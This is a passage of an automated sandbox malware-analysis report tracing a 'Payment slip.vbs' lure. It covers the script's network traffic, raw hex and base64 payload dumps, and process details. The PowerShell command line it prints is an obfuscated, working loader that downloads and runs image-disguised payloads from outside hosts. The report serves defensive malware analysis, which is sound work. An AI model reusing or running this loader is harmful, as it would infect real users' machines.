                                                                                                            2025-02-06 10:23:07 UTC1749INData Raw: 6c f0 d4 81 68 44 6a 59 89 bb 4e 4e 8d 66 6b 19 dd 6f 12 44 dc f5 44 56 3a 6b 93 b9 65 d2 14 43 b3 48 9b 65 e7 a6 4d 3e 9e 6d ca 9c b3 3a 2b cf ab 3a af 87 73 a2 b8 f5 ce ba 56 78 ae f5 cd a1 79 5c 1a d6 3b cb 33 d1 89 86 84 dc d3 9d 14 14 84 d4 26 5a c4 ef 1a 5f 2d 47 65 71 93 5d 47 03 b3 b6 70 d7 3a 2f 96 f5 8e a7 c5 9a fa 33 cc e5 de 70 b4 71 60 e7 5d 1a e7 d6 89 70 cf a2 b5 8e 6b e9 89 72 d0 99 6b 1b 49 91 a4 96 f9 a7 53 a9 f0 56 b3 d6 f9 9e 75 d0 b0 0d 6b 07 1a 4c e5 ac ed 12 d5 e9 81 73 d5 96 68 d2 66 07 a7 31 be 7d 1a 79 75 2f aa b8 f5 97 a6 67 19 ae 9c 73 eb 22 f4 5c fa de 7b 73 c2 53 3a cf 42 e7 76 6d 1c a5 ce 9d 1c 5d 55 ac c5 4b a2 59 e7 77 7c dd 0b 96 93 11 b6 98 4a f4 11 79 d5 ac ca 94 b5 b2 72 e8 71 16 d2 98 ed 9d 99 91 6c d9 52 b2 ad 23 2f
                                                                                                            Data Ascii: lhDjYNNfkoDDV:keCHeM>m:+:sVxy\;3&Z_-Geq]Gp:/3pq`]pkrkISVukLshf1}yu/gs"\{sS:Bvm]UKYw|JyrqlR#/
                                                                                                            2025-02-06 10:23:07 UTC9000INData Raw: 44 ba e7 1d 36 37 0f 3a 8c 7a f3 b9 98 ea d2 b8 5f 5e 57 3c 7d 1b 5a f2 d7 42 ce b1 d9 39 55 29 9a de 22 85 29 8a 88 a3 0e 5f 9d ed c3 d6 f3 3c 8b f4 71 d6 76 e8 b9 e3 df 54 9c 7b f4 44 9d 9d fe 7f 4e 77 db af 25 63 5d 79 e7 52 c7 46 6d 3a 62 6f 1a cb a6 61 ae c8 cb 6c 74 8d 31 b2 a5 cc a6 98 d1 6f 17 2f 5c f3 0b d1 7c 4a ce d3 86 a3 a5 72 ec bb f2 05 cf 1f 37 a6 fa 72 f3 73 f4 da 70 f5 f5 65 2e 66 3c 7d 31 db e7 1c bb cf 49 9d dc ce 5a f4 9c ba e9 02 3a f0 cd fb 01 9e 2f 72 69 88 68 01 88 68 01 82 68 00 1a 18 9a 06 e5 80 06 1c de 81 67 8d a7 a7 cd a9 93 51 1a 98 5d 68 4d 85 4b 51 a6 ac 05 60 e4 1a 70 27 4b 2a e4 a4 94 b5 2c 05 35 a8 aa 64 21 2b 9a ca f3 48 77 67 39 d2 eb 27 a9 2c 53 16 58 8a 42 91 25 9d 9a cf 3e 37 3d b5 e6 bd 67 d0 7c 16 bd c6 15 8d eb
                                                                                                            Data Ascii: D67:z_^W<}ZB9U)")_<qvT{DNw%c]yRFm:boalt1o/\|Jr7rspe.f<}1IZ:/rihhhgQ]hMKQ`p'K*,5d!+Hwg9',SXB%>7=g|
                                                                                                            2025-02-06 10:23:07 UTC16384INData Raw: b3 ab 5c eb cd 36 ad 66 34 bc 73 ae 83 9d cb bc 53 9a 15 c9 4d 65 2d 0e 97 2b cf 1d 63 b1 f9 fb 9a ac 6a 5b 85 68 f4 cf 45 cf 1e a2 ce 68 ed 94 e5 d3 4c 8a 8a 8b 85 cf a6 7d 79 64 f4 35 9e 19 f4 f1 b3 ca 7d 93 a9 e6 f9 fe e7 1e b3 e0 f1 7a 1e 67 7c 74 f3 e7 97 49 7d fc 97 1f b7 81 f1 3e a8 08 a1 03 10 34 c1 34 c0 10 2a 04 00 d3 01 34 4d 4d 0c 10 c4 c4 30 00 b0 10 30 43 00 00 13 00 00 04 c0 10 c4 43 40 0d 03 4c 50 10 00 0d 14 31 43 13 10 d0 09 82 60 21 82 60 98 00 bc fd 67 a7 e7 bc f3 d3 e7 5b 6d bd 91 ae ba 63 49 6b 79 de 7a b3 3a 26 dc d4 d0 43 4d 88 62 80 c9 54 93 3d 2d 54 8d 14 a9 00 90 e6 e8 c6 86 31 e9 2f 31 d4 a3 99 f4 23 9d 74 2b 31 9e a4 41 6d 70 ad 28 e7 3a 25 63 48 a8 d0 98 35 71 26 b3 9d 2e 90 06 74 e5 2c cc 37 58 85 d6 7a 84 52 55 a6 54 9a 29
                                                                                                            Data Ascii: \6f4sSMe-+cj[hEhL}yd5}zg|tI}>44*4MM00CC@LP1C`!`g[mcIkyz:&CMbT=-T1/1#t+1Amp(:%cH5q&.t,7XzRUT)
                                                                                                            2025-02-06 10:23:07 UTC1024INData Raw: 5c aa 92 56 6c 1c d2 59 6d 26 92 32 67 5a 33 69 19 b7 6b 16 81 4e 8e 14 e8 2e 07 4c dc f3 68 f5 b3 8e 3b 65 79 73 e9 c3 5c 78 e3 bf 3e 99 f0 7c 8d 7c 8f 57 2f 4a 72 5d 39 86 d9 cd 75 72 c6 99 92 75 74 67 5c 9d e6 13 5e 84 f9 be b6 2f 0d ed 9a 76 3c 22 34 88 e8 ac f6 d6 a5 52 64 54 6d b4 46 d1 9c 67 b6 5d 36 bc 7b 35 c6 b9 b4 33 5d f3 35 ce 87 59 4b b4 e6 ac d1 13 17 9e b9 8d cd 0c ac 0d 1e 8e 6b 96 7b 25 31 a7 a6 a1 7c fd 18 d9 93 e7 d6 77 c3 4d 6e 78 1f 62 b3 99 f5 e0 93 cd d8 ae 7c fd 3a 76 b3 9b 7d 71 ce d5 72 ce a6 9a 61 69 ac 3e 33 74 bb 26 b4 a9 ae 5d a7 2d 38 b7 8f 4e 7c ea b3 b7 7f 0f 63 d4 39 2b 1b ea 58 33 a3 0c f5 ab c9 73 32 75 f3 eb bc 6f cf 8a 95 eb 71 ac 59 cb c8 be ce 3e 7e a5 74 61 8d 9b e5 1b 58 76 65 58 d6 fc ea 0a bc b1 b3 af 3c 34 37
                                                                                                            Data Ascii: \VlYm&2gZ3ikN.Lh;eys\x>||W/Jr]9urutg\^/v<"4RdTmFg]6{53]5YKk{%1|wMnxb|:v}qrai>3t&]-8N|c9+X3s2uoqY>~taXveX<47


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.949709185.199.110.1334436164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2025-02-06 10:23:17 UTC116OUTGET /richie213/36k/refs/heads/main/IAmdgfd.txt HTTP/1.1
                                                                                                            Host: raw.githubusercontent.com
                                                                                                            Connection: Keep-Alive
                                                                                                            2025-02-06 10:23:17 UTC901INHTTP/1.1 200 OK
                                                                                                            Connection: close
                                                                                                            Content-Length: 521976
                                                                                                            Cache-Control: max-age=300
                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                            ETag: "173d9c7241ded9c777b1eccf3d2d54c2de0aa6e128d8435edfe4d22c74744d9d"
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-Frame-Options: deny
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            X-GitHub-Request-Id: D8FE:31C7DE:308850:367582:67A48A81
                                                                                                            Accept-Ranges: bytes
                                                                                                            Date: Thu, 06 Feb 2025 10:23:17 GMT
                                                                                                            Via: 1.1 varnish
                                                                                                            X-Served-By: cache-ewr-kewr1740044-EWR
                                                                                                            X-Cache: HIT
                                                                                                            X-Cache-Hits: 0
                                                                                                            X-Timer: S1738837397.157934,VS0,VE62
                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                            X-Fastly-Request-ID: 9862efcc5e953ad90b44af72f23299ee78dbb2b0
                                                                                                            Expires: Thu, 06 Feb 2025 10:28:17 GMT
                                                                                                            Source-Age: 0
                                                                                                            2025-02-06 10:23:17 UTC1378INData Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                            Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                            2025-02-06 10:23:17 UTC1378INData Raw: 53 50 75 39 57 61 7a 4a 58 5a 57 52 33 63 6c 5a 57 61 75 46 57 62 67 49 53 4d 32 35 53 62 7a 46 6d 4f 74 39 32 59 74 51 6e 5a 76 4e 33 62 79 4e 57 61 74 31 79 63 68 31 57 5a 6f 4e 32 63 36 34 6d 63 31 4a 53 50 7a 35 47 62 74 68 48 49 35 78 6d 59 74 56 32 63 7a 46 47 50 4b 30 67 43 4e 34 7a 50 69 4d 58 5a 35 4a 53 50 6c 35 32 62 73 46 47 5a 75 46 47 64 7a 42 69 49 34 30 69 52 55 56 6c 49 39 63 6d 62 70 52 32 62 6a 35 57 5a 67 49 43 4d 75 45 6a 49 39 34 32 62 70 4e 6e 63 6c 5a 48 49 73 31 47 65 2f 77 7a 76 37 65 72 54 67 44 4f 41 41 41 41 4d 41 34 43 41 77 41 67 4c 41 41 44 41 75 41 51 4d 41 41 41 41 75 42 77 62 41 6b 47 41 7a 42 67 63 41 55 47 41 57 42 41 49 41 6b 48 41 73 42 67 59 41 30 47 41 6c 42 77 63 41 4d 48 41 42 42 51 41 41 67 41 41 34 41 41 41 41
                                                                                                            Data Ascii: SPu9WazJXZWR3clZWauFWbgISM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN2c64mc1JSPz5GbthHI5xmYtV2czFGPK0gCN4zPiMXZ5JSPl52bsFGZuFGdzBiI40iRUVlI9cmbpR2bj5WZgICMuEjI942bpNnclZHIs1Ge/wzv7erTgDOAAAAMA4CAwAgLAADAuAQMAAAAuBwbAkGAzBgcAUGAWBAIAkHAsBgYA0GAlBwcAMHABBQAAgAA4AAAA
                                                                                                            2025-02-06 10:23:17 UTC1378INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 67 41 51 4a 2f 44 41 41 41 41 41 41 73 78 47 5a 75 55 57 5a 79 39 32 59 7a 31 47 41 75 6c 57 59 4e 56 47 65 46 4a 33 62 44 39 46 41 41 41 41 41 41 41 41 41 46 63 4c 59 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 41 41 55 77 74 75 42 41
                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQgAQJ/DAAAAAAsxGZuUWZy92Yz1GAulWYNVGeFJ3bD9FAAAAAAAAAFcLYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAUwtuBA
                                                                                                            2025-02-06 10:23:17 UTC1378INData Raw: 64 35 56 52 70 56 41 6b 4c 35 64 47 45 45 45 4f 4c 58 76 65 72 54 67 44 4f 34 4f 56 71 64 54 31 30 71 59 37 35 5a 38 6d 51 69 74 61 57 37 72 65 50 79 30 6f 30 59 38 61 75 48 6e 41 79 2f 61 44 37 4f 54 45 46 32 72 49 4a 48 47 4d 54 58 5a 6d 4a 39 50 36 58 34 63 6d 4e 65 72 54 67 44 4c 35 6d 76 4a 63 52 54 77 76 32 4b 6d 66 47 34 6b 37 35 42 32 64 37 44 78 6c 59 76 4d 7a 68 6b 65 72 54 67 44 54 77 6f 77 6c 46 35 31 7a 41 69 59 41 67 37 69 46 69 65 72 54 67 44 64 56 79 77 43 42 49 41 39 75 65 50 42 5a 4c 6c 42 65 73 55 70 72 48 67 53 5a 69 65 66 47 4e 4c 31 38 69 39 72 64 5a 2f 48 78 57 57 52 70 75 56 74 77 34 35 48 4c 4f 6f 37 52 58 65 72 54 67 44 4a 5a 6e 72 78 42 57 46 38 44 46 35 68 56 4d 76 70 76 7a 76 4d 4b 6d 7a 66 47 63 78 47 5a 35 43 7a 62 31 36 34
                                                                                                            Data Ascii: d5VRpVAkL5dGEEEOLXverTgDO4OVqdT10qY75Z8mQitaW7rePy0o0Y8auHnAy/aD7OTEF2rIJHGMTXZmJ9P6X4cmNerTgDL5mvJcRTwv2KmfG4k75B2d7DxlYvMzhkerTgDTwowlF51zAiYAg7iFierTgDdVywCBIA9uePBZLlBesUprHgSZiefGNL18i9rdZ/HxWWRpuVtw45HLOo7RXerTgDJZnrxBWF8DF5hVMvpvzvMKmzfGcxGZ5Czb164
                                                                                                            2025-02-06 10:23:17 UTC1378INData Raw: 4f 65 72 54 67 44 61 36 53 4b 6e 69 32 6b 62 37 58 61 71 48 65 72 54 67 44 4a 72 44 34 68 46 63 36 48 35 43 68 7a 47 2f 50 6a 4a 6d 39 58 41 71 37 48 65 72 4d 59 75 57 50 4a 73 31 79 71 49 6c 36 7a 66 67 6d 52 45 50 7a 34 58 50 56 2f 66 5a 74 55 45 4b 64 57 32 50 58 50 36 30 56 2f 62 30 49 34 61 62 59 65 63 62 64 44 4e 4f 6f 46 31 33 4b 44 71 48 4c 52 78 41 78 70 56 2f 36 35 71 57 4f 5a 30 79 52 6d 69 62 47 76 53 61 69 68 47 39 61 56 64 35 6d 6d 47 4a 53 56 69 51 55 6c 6c 62 69 6d 6b 72 55 30 65 31 45 56 7a 6c 32 43 66 32 49 50 6d 53 43 4b 43 34 6f 65 72 54 67 44 4a 57 72 6d 64 76 53 4e 43 6a 49 39 57 7a 4c 6c 78 44 57 39 59 33 6f 66 62 31 39 41 49 63 36 4b 45 4a 7a 61 4f 52 6a 31 73 70 2f 61 63 4c 73 71 2f 37 4f 7a 6d 42 54 55 59 49 4d 50 30 6c 43 5a 47
                                                                                                            Data Ascii: OerTgDa6SKni2kb7XaqHerTgDJrD4hFc6H5ChzG/PjJm9XAq7HerMYuWPJs1yqIl6zfgmREPz4XPV/fZtUEKdW2PXP60V/b0I4abYecbdDNOoF13KDqHLRxAxpV/65qWOZ0yRmibGvSaihG9aVd5mmGJSViQUllbimkrU0e1EVzl2Cf2IPmSCKC4oerTgDJWrmdvSNCjI9WzLlxDW9Y3ofb19AIc6KEJzaORj1sp/acLsq/7OzmBTUYIMP0lCZG
                                                                                                            2025-02-06 10:23:17 UTC1378INData Raw: 47 46 76 38 77 6b 36 42 74 6d 47 46 31 7a 78 39 35 51 43 41 78 44 4b 78 75 39 54 35 53 6c 6e 31 37 54 68 6c 4b 54 56 53 5a 66 58 68 57 79 4d 74 71 71 4b 42 37 33 30 42 6c 75 50 78 6e 78 65 6e 39 47 58 73 4a 4d 51 72 77 4d 55 49 4c 4d 57 50 6d 30 59 4f 73 42 6c 4d 34 58 55 51 63 39 6e 34 35 55 38 57 59 2f 45 37 72 4a 58 77 5a 33 78 61 47 4a 32 45 4f 65 72 54 67 44 64 63 43 56 4b 58 65 35 4e 4d 42 56 54 4a 32 76 78 36 4e 55 71 6d 31 36 37 4b 32 6a 68 49 30 2f 34 59 79 75 69 65 72 54 67 44 6b 48 31 76 32 6e 33 51 49 34 37 77 7a 62 34 4f 66 68 6b 43 72 37 79 55 73 4f 39 63 74 44 61 4f 4a 51 7a 43 76 36 30 6a 4f 69 65 72 54 67 44 37 6a 34 49 38 6b 39 46 72 58 6f 37 69 42 48 47 56 44 49 76 5a 5a 57 35 5a 41 7a 43 61 47 45 62 34 4f 67 67 64 71 57 66 74 38 6c 75
                                                                                                            Data Ascii: GFv8wk6BtmGF1zx95QCAxDKxu9T5Sln17ThlKTVSZfXhWyMtqqKB730BluPxnxen9GXsJMQrwMUILMWPm0YOsBlM4XUQc9n45U8WY/E7rJXwZ3xaGJ2EOerTgDdcCVKXe5NMBVTJ2vx6NUqm167K2jhI0/4YyuierTgDkH1v2n3QI47wzb4OfhkCr7yUsO9ctDaOJQzCv60jOierTgD7j4I8k9FrXo7iBHGVDIvZZW5ZAzCaGEb4OggdqWft8lu
                                                                                                            2025-02-06 10:23:17 UTC1378INData Raw: 47 43 6d 6b 72 65 74 61 75 6e 67 4d 4d 6d 48 49 51 6a 4e 69 6c 37 65 72 54 67 44 39 74 6c 73 4f 36 7a 56 38 6a 72 6e 4f 43 74 64 32 75 55 57 75 78 34 57 34 64 4f 2f 32 4f 76 69 38 6d 72 37 34 35 33 64 37 56 67 46 33 6b 67 68 37 45 70 53 65 72 54 67 44 53 34 6f 61 6a 71 71 64 74 61 66 5a 75 48 69 62 57 6c 4a 52 6e 6b 57 65 72 54 67 44 67 36 61 31 47 43 4e 74 48 71 42 65 72 54 67 44 35 7a 6b 64 4a 71 54 75 30 36 2f 4a 32 32 45 33 59 38 44 56 63 78 77 35 67 36 75 36 6e 65 50 4c 47 47 53 6e 52 45 49 56 65 72 54 67 44 5a 69 46 75 65 72 54 67 44 30 4b 32 75 58 55 79 66 35 61 68 77 76 70 62 31 6c 41 6b 59 38 63 41 47 30 43 68 38 6f 4e 66 30 79 30 43 56 6a 55 68 67 45 66 51 4a 70 6f 30 69 63 35 76 6a 57 51 33 2f 33 65 72 54 67 44 57 38 46 63 62 51 4e 59 70 53 41
                                                                                                            Data Ascii: GCmkretaungMMmHIQjNil7erTgD9tlsO6zV8jrnOCtd2uUWux4W4dO/2Ovi8mr7453d7VgF3kgh7EpSerTgDS4oajqqdtafZuHibWlJRnkWerTgDg6a1GCNtHqBerTgD5zkdJqTu06/J22E3Y8DVcxw5g6u6nePLGGSnREIVerTgDZiFuerTgD0K2uXUyf5ahwvpb1lAkY8cAG0Ch8oNf0y0CVjUhgEfQJpo0ic5vjWQ3/3erTgDW8FcbQNYpSA
                                                                                                            2025-02-06 10:23:17 UTC1378INData Raw: 4d 64 76 33 54 53 64 72 65 72 54 67 44 36 65 72 54 67 44 4c 6f 75 74 2f 38 4f 66 59 46 48 42 63 59 69 52 5a 76 38 44 47 4b 68 46 39 54 44 52 64 38 6e 55 43 59 6b 5a 51 31 45 33 37 39 2f 7a 65 73 6c 4e 6a 41 51 61 30 55 42 67 79 6f 65 72 54 67 44 6f 6d 35 57 38 65 72 54 67 44 6e 6b 48 7a 53 54 62 65 72 54 67 44 31 55 53 44 49 65 41 78 71 49 74 58 77 58 36 38 75 4c 64 4d 36 74 6b 73 2f 61 64 72 4e 63 41 55 70 69 74 6b 43 43 53 6b 53 4b 56 58 30 63 58 78 33 6f 4c 50 36 55 42 71 35 57 51 35 52 63 55 43 56 52 68 49 4e 46 79 33 52 31 47 4e 67 6f 73 4f 62 31 30 43 62 78 79 66 48 32 34 50 58 4b 45 79 6a 43 68 78 4c 53 74 38 6f 7a 6b 6d 78 6b 32 42 30 39 47 44 7a 64 52 53 4b 30 58 65 72 54 67 44 39 48 45 6f 67 31 47 6a 54 32 71 44 52 59 51 4c 4b 46 52 35 30 37 38
                                                                                                            Data Ascii: Mdv3TSdrerTgD6erTgDLout/8OfYFHBcYiRZv8DGKhF9TDRd8nUCYkZQ1E379/zeslNjAQa0UBgyoerTgDom5W8erTgDnkHzSTberTgD1USDIeAxqItXwX68uLdM6tks/adrNcAUpitkCCSkSKVX0cXx3oLP6UBq5WQ5RcUCVRhINFy3R1GNgosOb10CbxyfH24PXKEyjChxLSt8ozkmxk2B09GDzdRSK0XerTgD9HEog1GjT2qDRYQLKFR5078
                                                                                                            2025-02-06 10:23:17 UTC1378INData Raw: 69 38 67 63 49 6b 67 74 70 35 2f 76 65 72 54 67 44 67 30 44 6f 7a 77 74 77 38 46 46 32 59 67 59 6f 75 68 58 6b 69 6a 58 2f 41 6d 48 76 75 39 50 56 4b 73 4d 6e 55 64 2f 73 44 4a 35 57 54 77 71 42 4f 5a 35 6e 4b 6e 59 43 64 57 43 53 53 69 4d 32 35 30 38 65 70 31 5a 4c 46 72 4b 6f 69 72 6f 47 7a 6c 61 69 52 5a 61 44 65 72 54 67 44 4e 45 38 31 53 6a 63 6f 66 38 67 68 6b 79 52 35 76 62 41 38 46 61 74 41 4b 55 78 31 6b 36 31 43 57 4b 78 38 4f 67 4b 57 41 42 6b 42 78 35 38 77 69 43 79 4e 35 4f 57 51 32 68 34 49 57 39 66 50 4c 4d 67 57 59 35 34 6a 64 36 52 46 42 37 61 65 72 54 67 44 47 6e 4d 75 6b 4c 74 68 48 39 4c 61 67 31 37 45 32 57 50 59 6c 65 65 65 72 54 67 44 36 2f 49 49 67 45 56 79 46 62 72 45 67 79 42 45 4d 62 55 4f 62 46 6f 4a 65 72 54 67 44 33 6b 31 56
                                                                                                            Data Ascii: i8gcIkgtp5/verTgDg0Dozwtw8FF2YgYouhXkijX/AmHvu9PVKsMnUd/sDJ5WTwqBOZ5nKnYCdWCSSiM2508ep1ZLFrKoiroGzlaiRZaDerTgDNE81Sjcof8ghkyR5vbA8FatAKUx1k61CWKx8OgKWABkBx58wiCyN5OWQ2h4IW9fPLMgWY54jd6RFB7aerTgDGnMukLthH9Lag17E2WPYleeerTgD6/IIgEVyFbrEgyBEMbUObFoJerTgD3k1V
                                                                                                            2025-02-06 10:23:17 UTC1378INData Raw: 55 50 59 61 33 72 6c 78 78 2f 61 72 65 65 49 68 36 4c 70 6e 53 68 69 4d 71 6a 64 58 52 67 44 68 50 44 45 50 6f 6e 71 47 6d 44 32 6e 4d 69 65 72 54 67 44 6a 49 66 6e 7a 2f 66 55 7a 33 56 59 54 6a 68 77 76 59 31 36 4f 6e 45 54 4a 73 6d 4c 4f 44 30 34 49 52 6c 30 77 34 36 54 48 38 51 63 56 77 39 30 4c 45 50 32 4c 6d 39 47 6d 53 63 45 70 6f 58 33 51 78 76 48 53 35 64 68 7a 72 4e 6b 77 75 39 76 72 78 44 58 67 4c 51 35 35 39 71 76 33 6a 76 6e 7a 57 57 62 43 79 71 35 68 65 35 70 4e 47 64 53 33 34 4c 47 63 38 57 44 66 67 72 35 46 42 74 67 67 73 4d 4a 74 48 48 4a 59 52 5a 49 6c 34 71 73 7a 63 79 6f 5a 48 34 39 4d 43 56 48 65 70 53 31 65 72 54 67 44 65 72 54 67 44 68 4f 4c 74 75 32 6e 5a 75 65 78 72 34 69 38 4f 34 6c 34 32 32 37 47 6d 5a 68 32 48 79 38 39 4c 56 51
                                                                                                            Data Ascii: UPYa3rlxx/areeIh6LpnShiMqjdXRgDhPDEPonqGmD2nMierTgDjIfnz/fUz3VYTjhwvY16OnETJsmLOD04IRl0w46TH8QcVw90LEP2Lm9GmScEpoX3QxvHS5dhzrNkwu9vrxDXgLQ559qv3jvnzWWbCyq5he5pNGdS34LGc8WDfgr5FBtggsMJtHHJYRZIl4qszcyoZH49MCVHepS1erTgDerTgDhOLtu2nZuexr4i8O4l4227GmZh2Hy89LVQ


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:05:23:01
                                                                                                            Start date:06/02/2025
                                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment slip.vbs"
                                                                                                            Imagebase:0x7ff7fcaf0000
                                                                                                            File size:170'496 bytes
                                                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:2
                                                                                                            Start time:05:23:01
                                                                                                            Start date:06/02/2025
                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@H